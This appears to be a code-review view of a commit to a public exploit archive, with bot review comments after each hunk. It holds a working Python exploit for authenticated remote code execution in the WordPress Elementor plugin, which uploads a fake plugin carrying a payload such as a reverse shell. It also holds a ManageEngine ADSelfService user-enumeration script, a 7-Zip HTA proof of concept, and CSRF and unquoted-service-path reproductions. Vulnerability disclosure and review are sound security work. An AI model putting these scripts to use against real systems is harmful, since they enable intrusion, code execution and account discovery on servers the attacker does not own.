# 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php
# 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file)
# 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in DoLogin function)
# 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file)
#
# The file we upload must have the following structure:
# 1. It must be a ZIP file. You can name it as you want.
# 2. It must contain a folder called "elementor-pro"
# 3. This folder must contain a file named "elementor-pro.php"
# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
#
# WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload.
# If it tries, for example, to connect to an offline host, it could lead to a Denial of Service.
# In order to prevent this, I suggest you to use some variable to activate the payload.
# Something like this (visit anypage.php?activate=1 in order to continue with the actual payload):
# if (!isset($_GET['activate']))
# return;
# Change the following 4 variables:
payloadFileName = 'elementor-pro.zip' # Change this with the path of the ZIP archive that contains your payload
baseUrl = 'http://192.168.56.103/wordpress/' # Change this with the base url of the target
username = 'guest' # Change this with the username you want to use to log in
password = 'test' # Change this with the password you want to use to log in
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
session = requests.Session()
cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' } # WordPress needs this to tell if browser can manage cookies
def DoLogin(username, password):
global cookies
loginUrl = baseUrl + 'wp-login.php'
adminUrl = baseUrl + 'wp-admin/'
data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 }
# search for: "ajax":{"url":"http:\/\/baseUrl\/wp-admin\/admin-ajax.php","nonce":"4e8878bdba"}
# 4e8878bdba is just an example of nonce. It can be anything else.
regexp = re.compile('"ajax":\\{"url":".+admin\\-ajax\\.php","nonce":"(.+)"\\}')
response = session.post(loginUrl, cookies=cookies, data=data)
search = regexp.search(response.text)
if not search:
# I've tested this on WordPress v. 5.9.3
# Fix the regexp if needed.
print('Error - Invalid credentials?')
#print(response.text)
else:
return search.group(1)
def UploadFile(fileName, nonce):
uploadUrl = baseUrl + 'wp-admin/admin-ajax.php'
data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce }
files = { 'fileToUpload' : open(fileName, 'rb') }
regexp = re.compile('"elementorProInstalled":true') # search for: "elementorProInstalled":true
response = session.post(uploadUrl, data=data, files=files)
search = regexp.search(response.text)
if not search:
# If Elemento Pro is already installed, the upload will fail.
# You can print the response to investigate further
print ('Error - Upload failed')
# print (response.text)
return False
else:
print ('Upload completed successfully!')
return True
# Define YOUR method to activate your payload (if needed)
def ActivatePayload():
payloadUrl = baseUrl + 'index.php?activate=1'
session.get(payloadUrl)
print('Trying to login...')
nonce = DoLogin(username, password)
print('Nonce found: ' + nonce)
print('Uploading payload...')
fileUploaded = UploadFile(payloadFileName, nonce)
# Define YOUR method to activate your payload (if needed)
if fileUploaded:
print ('Activating payload...')
ActivatePayload()
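Review bot: `nonce = DoLogin(username, password)` returns `None` when the regex does not match (invalid credentials or a different WordPress build), and the next line `print('Nonce found: ' + nonce)` then raises `TypeError` instead of a clear error; check for `None` and exit before continuing. `# Version: 3.6.0, 3.6.1, 3.62` has a typo for `3.6.2`. The `#!/usr/bin/python` shebang is not on line 1 and does not pin Python 3. `open(fileName, 'rb')` in `UploadFile()` is never closed; use a `with` block. `global cookies` in `DoLogin()` is unnecessary since the variable is only read. For defenders, the description already names the observable event (`action=elementor_upload_and_install_pro` posted to `admin-ajax.php` by a low-privileged account, followed by a new plugin directory `elementor-pro`), which is worth calling out as the detection signal.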

View file

@ -0,0 +1,13 @@
# Exploit Title: Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)# Google Dork: NA
# Date: 11/03/2022
# Exploit Author: Ali J
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.5.0
# Version: 1.5.0
# Tested on: Windows 10
Steps to Reproduce:
1. Login with user 1 and navigate to localhost/FUEL-CMS/fuel/sitevariables
2. Select any variable, click on delete button and select "yes, delete it". Intercept this request and generate a CSRF POC for this. After that drop the request.
3. Login with user 2 in a seperate browser and execute the CSRF POC.
4. Observe that the site variable has been deleted. To confirm, login with user 1 again and observe that the variable has been deleted from site variables.
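Review bot: the first line fuses two header fields (`# Exploit Title: Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)# Google Dork: NA`); they need a line break. `# Date: 11/03/2022` is ambiguous. Step 2 says to `generate a CSRF POC` but no PoC HTML or request is included, so the finding is not reproducible from the entry alone; include the intercepted `POST` (endpoint and parameters) with host and identifiers as placeholders. Step 3 should state the role of user 2, since impact depends on whether the victim must be an administrator. `seperate` is a typo for `separate`.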

View file

@ -0,0 +1,23 @@
# Exploit Title: Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
# Exploit Author: Antonio Cuomo (arkantolo)
# Exploit Date: 2022-04-11
# Vendor : Microsoft
# Version : 15.0.847.40
# Tested on OS: Microsoft Exchange Server 2013 SP1
#PoC :
==============
C:\>sc qc MSExchangeMailboxAssistants
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: MSExchangeMailboxAssistants
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxAssistants.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : Microsoft Exchange Mailbox Assistants
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
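Review bot: the `sc qc` output shows `NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxAssistants.exe`, an unquoted path whose only spaces are in `Program Files` and `Exchange Server`; abusing it requires write access to `C:\` or `C:\Program Files\Microsoft\`, which standard users do not have by default, and the header should state that prerequisite so severity is not overstated. The console output is localized Italian (`OPERAZIONI RIUSCITE`, `TIPO_AVVIO`); reproducing it on an English build, or noting the locale, would make it comparable with the other entries. `#PoC :` should follow the `# PoC:` spacing used elsewhere, and the header lacks a CVE or vendor reference.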

View file

@ -0,0 +1,23 @@
# Exploit Title: Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path
# Exploit Author: Antonio Cuomo (arkantolo)
# Exploit Date: 2022-04-11
# Vendor : Microsoft
# Version : 15.0.847.40
# Tested on OS: Microsoft Exchange Server 2013 SP1
#PoC :
==============
C:\>sc qc MSExchangeADTopology
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: MSExchangeADTopology
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : Microsoft Exchange Active Directory Topology
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
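Review bot: same class of finding as the MSExchangeMailboxAssistants entry: `NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe` is unquoted, but the spaces are only in `Program Files` and `Exchange Server`, both under directories a standard user cannot write to by default; the header should name the required write permission. Both entries share the same `15.0.847.40` version and Exchange 2013 SP1 test system and would be clearer as one advisory listing the unquoted Exchange service paths rather than one file per service. `#PoC :` spacing should match the other headers.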

View file

@ -0,0 +1,22 @@
# Exploit Title: 7-zip - Code Execution / Local Privilege Escalation
# Exploit Author: Kağan Çapar
# Date: 2020-04-12
# Vendor homepage: https://www.7-zip.org/
# Software link: https://www.7-zip.org/a/7z2107-x64.msi
# Version: 21.07 and all versions
# Tested On: Windows 10 Pro (x64)
# References: https://github.com/kagancapar/CVE-2022-29072
# About:
7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.
# Proof of Concept:
<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
<head>
<html>
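Review bot: the HTML PoC is malformed: the second `<head>` and `<html>` on the last two lines should be `</head>` and `</html>`, and there is no `<body>`. `# Date: 2020-04-12` conflicts with the CVE-2022-29072 reference; 2022 is presumably intended. `# Version: 21.07 and all versions` should read `21.07 and earlier`, matching the About line. The PoC only launches `cmd.exe` through `WScript.Shell` in the context of the user who drops the file, so the 'Local Privilege Escalation' in the title is not demonstrated by the code shown; the entry should either explain how elevation occurs or retitle to code execution.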

View file

@ -0,0 +1,37 @@
# Exploit Title: PTPublisher v2.3.4 - Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2022-18-04
# Vendor Homepage: https://www.primera.com/
# Tested Version: 2.3.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
PTProtect
PTProtect
C:\Program Files (x86)\Primera
Technology\PTPublisher\UsbFlashDongleService.exe
Auto
C:\>sc qc PTProtect
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: PTProtect
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\PrimeraTechnology\PTPublisher\UsbFlashDongleService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : PTProtect
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
Host Name: DESKTOP-OUHAB1I
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19044 N/A Build 19044
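Review bot: `# Discovery Date: 2022-18-04` is not a valid date (month 18); `2022-04-18` is presumably intended, and the same typo appears in the EaseUS entry by the same author. The `wmic` output shows the path as `C:\Program Files (x86)\Primera Technology\PTPublisher\UsbFlashDongleService.exe` (space in `Primera Technology`, wrapped across two lines), while `sc qc` shows `C:\Program Files (x86)\PrimeraTechnology\...` without the space; the entry should show the real path, because if the only space is in `Program Files (x86)` then abuse needs write access to `C:\`, which standard users lack by default, and that prerequisite belongs in the header. The `wmic` command is also wrapped across two lines and should be on one.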

View file

@ -0,0 +1,35 @@
# Exploit Title: EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2022-18-04
# Vendor Homepage: https://www.easeus.com/
# Tested Version: 15.1.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto
| findstr /i /v "C:\Windows\\" | findstr /i /v """
EaseUS UPDATE SERVICE
EaseUS UPDATE SERVICE C:\Program Files
(x86)\EaseUS\ENS\ensserver.exe Auto
C:\>sc qc "EaseUS UPDATE SERVICE"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: EaseUS UPDATE SERVICE
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : EaseUS UPDATE SERVICE
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
Host Name: DESKTOP-HR3T34O
OS Name: Microsoft Windows 10 Home
OS Version: 10.0.19042 N/A Build 19042
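Review bot: two header fields contradict the captured output in this hunk: `# Discovery Date: 2022-18-04` is not a valid date (presumably 2022-04-18), and `# Tested on OS: Microsoft Windows 10 Pro x64` does not match the `systeminfo` output below it, which reports `Microsoft Windows 10 Home` build 19042. The path `C:\Program Files (x86)\EaseUS\ENS\ensserver.exe` has spaces only inside `Program Files (x86)`, so the only locations that matter are the root of `C:\` and `C:\Program Files (x86)`, neither of which a standard user can write files into on a default installation; without the directory ACLs shown, the entry should claim no more than an unquoted path, and it should state the remediation (quote the service's binary path).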

View file

@ -0,0 +1,63 @@
# Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: ADSelfService 6.1 Build 6121
# Tested Against: Build 6118 - 6121
# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
# !/usr/bin/python3
import requests
import sys
import time
import urllib3
from urllib3.exceptions import InsecureRequestWarning
"""
The domain users can be enumerated like userenum module of the kerbrute tool using this exploit.
If you conducted a brute-force attack against a user, please run the script after 30 minutes (default settings) otherwise the results can be false positive.
"""
def request(target, user):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = target + 'ServletAPI/accounts/login'
data = {"loginName": user}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
req = requests.post(url, data=data, headers=headers, verify=False)
# For debugging
# print("[*] Response for " + user + ": " + req.text.strip())
if 'PASSWORD' in req.text:
print("[+] " + user + " is VALID!")
elif 'Your account has been disabled' in req.text:
print("[+] " + user + " account has been DISABLED.")
elif 'Your account has expired' in req.text:
print("[+] " + user + " account has EXPIRED.")
elif 'Enter the text as shown in the image.' in req.text:
print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ")
elif 'Permission Denied.' in req.text:
print("[-] " + user + " is not found.")
def get_users(target, file):
try:
file = open(file, "r")
for line in file:
line = line.strip()
time.sleep(0.5)
request(target, user=line)
except FileNotFoundError:
print("[-] File not found!")
sys.exit(1)
def main(args):
if len(args) != 3:
print("[*] Usage: %s url usernames_file" % (args[0]))
print("[*] Example: %s https://target/ /tmp/usernames.txt" % (args[0]))
sys.exit(1)
get_users(target=args[1], file=args[2])
if __name__ == "__main__":
main(args=sys.argv)
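Review bot: the shebang on the first code line is broken: `# !/usr/bin/python3` has a space after `#`, and it sits after the header comments rather than on line 1, so the file will not run as `./50873.py`; drop the space and move it to the first line. `from urllib3.exceptions import InsecureRequestWarning` is unused (the code references `urllib3.exceptions.InsecureRequestWarning` directly), `disable_warnings` is re-invoked on every request instead of once at module level, and `get_users` opens the wordlist without `with`, so the handle is never closed. `url = target + 'ServletAPI/accounts/login'` silently produces `https://targetServletAPI/...` when the URL is given without the trailing slash that the usage example shows, and `requests.post` has no `timeout`, so one unresponsive host hangs the whole run. From the detection side, the behaviour the script depends on is fully visible in the hunk: POSTs to `/ServletAPI/accounts/login` carrying a `loginName` but no password, repeated at 0.5 s intervals across a wordlist, which is a straightforward pattern to alert on in the product's access logs.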

View file

@ -11477,6 +11477,11 @@ id,file,description,date,author,type,platform,port
50852,exploits/windows/local/50852.txt,"Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path",1970-01-01,"Manthan Chhabra",local,windows,
50858,exploits/linux/local/50858.txt,"binutils 2.37 - Objdump Segmentation Fault",1970-01-01,"Marlon Petry",local,linux,
50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
50867,exploits/windows/local/50867.txt,"Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
50883,exploits/windows/local/50883.txt,"7-zip - Code Execution / Local Privilege Escalation",1970-01-01,"Kağan Çapar",local,windows,
50885,exploits/windows/local/50885.txt,"PTPublisher v2.3.4 - Unquoted Service Path",1970-01-01,bios,local,windows,
50886,exploits/windows/local/50886.txt,"EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path",1970-01-01,bios,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
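Review bot: the title in the new 50883 row, `7-zip - Code Execution / Local Privilege Escalation`, carries no version, while the file it indexes states `Version: 21.07 and all versions` and the other rows added in this hunk give one where known (`15.0.847.40`, `PTPublisher v2.3.4`); `7-Zip 21.07 - ...` would match both the header and the vendor's own capitalisation used in the exploit's About line.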
@ -18664,6 +18669,12 @@ id,file,description,date,author,type,platform,port
50856,exploits/hardware/remote/50856.py,"Kramer VIAware - Remote Code Execution (RCE) (Root)",1970-01-01,sharkmoos,remote,hardware,
50857,exploits/multiple/remote/50857.txt,"Opmon 9.11 - Cross-site Scripting",1970-01-01,"Marlon Petry",remote,multiple,
50861,exploits/linux/remote/50861.txt,"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux,
50870,exploits/hardware/remote/50870.txt,"Zyxel NWA-1100-NH - Command Injection",1970-01-01,"Ahmed Alroky",remote,hardware,
50873,exploits/windows/remote/50873.py,"ManageEngine ADSelfService Plus 6.1 - User Enumeration",1970-01-01,"Metin Yunus Kandemir",remote,windows,
50875,exploits/hardware/remote/50875.txt,"Verizon 4G LTE Network Extender - Weak Credentials Algorithm",1970-01-01,LiquidWorm,remote,hardware,
50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,remote,hardware,
50879,exploits/hardware/remote/50879.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware,
50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",1970-01-01,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
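Review bot: the new 50873 row files the ADSelfService Plus user-enumeration script under `exploits/windows/remote/`, while the other web-application entries added in this commit (Scriptcase, the WordPress plugins, REDCap, OJS) go under `webapps`; the script itself only speaks HTTP to `/ServletAPI/accounts/login`, so `webapps` looks like the consistent classification.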
@ -44710,6 +44721,7 @@ id,file,description,date,author,type,platform,port
50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,
50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware,
50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple,
50872,exploits/php/webapps/50872.txt,"Scriptcase 9.7 - Remote Code Execution (RCE)",1970-01-01,luckyt0mat0,webapps,php,
50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,
50514,exploits/php/webapps/50514.txt,"WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50515,exploits/php/webapps/50515.txt,"WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
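Review bot: the new 50872 row for Scriptcase is inserted between 50512 and 50513 in the middle of the php/webapps block, whereas every other row added in this commit is appended at the end of its block in ascending id order (the final hunk appends 50869 through 50884 after 50865); moving it there keeps the file's ordering convention.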
@ -44933,3 +44945,11 @@ id,file,description,date,author,type,platform,port
50863,exploits/hardware/webapps/50863.txt,"Telesquare TLR-2855KS6 - Arbitrary File Deletion",1970-01-01,"Momen Eldawakhly",webapps,hardware,
50864,exploits/hardware/webapps/50864.txt,"Razer Sila - Local File Inclusion (LFI)",1970-01-01,"Kevin Randall",webapps,hardware,
50865,exploits/hardware/webapps/50865.txt,"Razer Sila - Command Injection",1970-01-01,"Kevin Randall",webapps,hardware,
50869,exploits/php/webapps/50869.txt,"WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection",1970-01-01,"Mohsen Dehghani",webapps,php,
50871,exploits/php/webapps/50871.rb,"Easy Appointments 1.4.2 - Information Disclosure",1970-01-01,"Alexandre ZANNI",webapps,php,
50874,exploits/php/webapps/50874.txt,"WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php,
50876,exploits/php/webapps/50876.txt,"WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)",1970-01-01,"Roel van Beurden",webapps,php,
50877,exploits/php/webapps/50877.txt,"REDCap 11.3.9 - Stored Cross Site Scripting",1970-01-01,"Kendrick Lam",webapps,php,
50881,exploits/php/webapps/50881.txt,"PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)",1970-01-01,"Hemant Kashyap",webapps,php,
50882,exploits/php/webapps/50882.py,"WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,AkuCyberSec,webapps,php,
50884,exploits/php/webapps/50884.txt,"Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Ali J",webapps,php,
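Review bot: the titles in rows 50874 and 50877 use `Stored Cross Site Scripting` (unhyphenated, and 50877 without the `(XSS)` suffix), while 50876 and 50881 in the same hunk use `Cross-Site Scripting`; normalising both to `Stored Cross-Site Scripting (XSS)` matches the existing rows such as 50507, 50514 and 50515 in the previous hunk.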
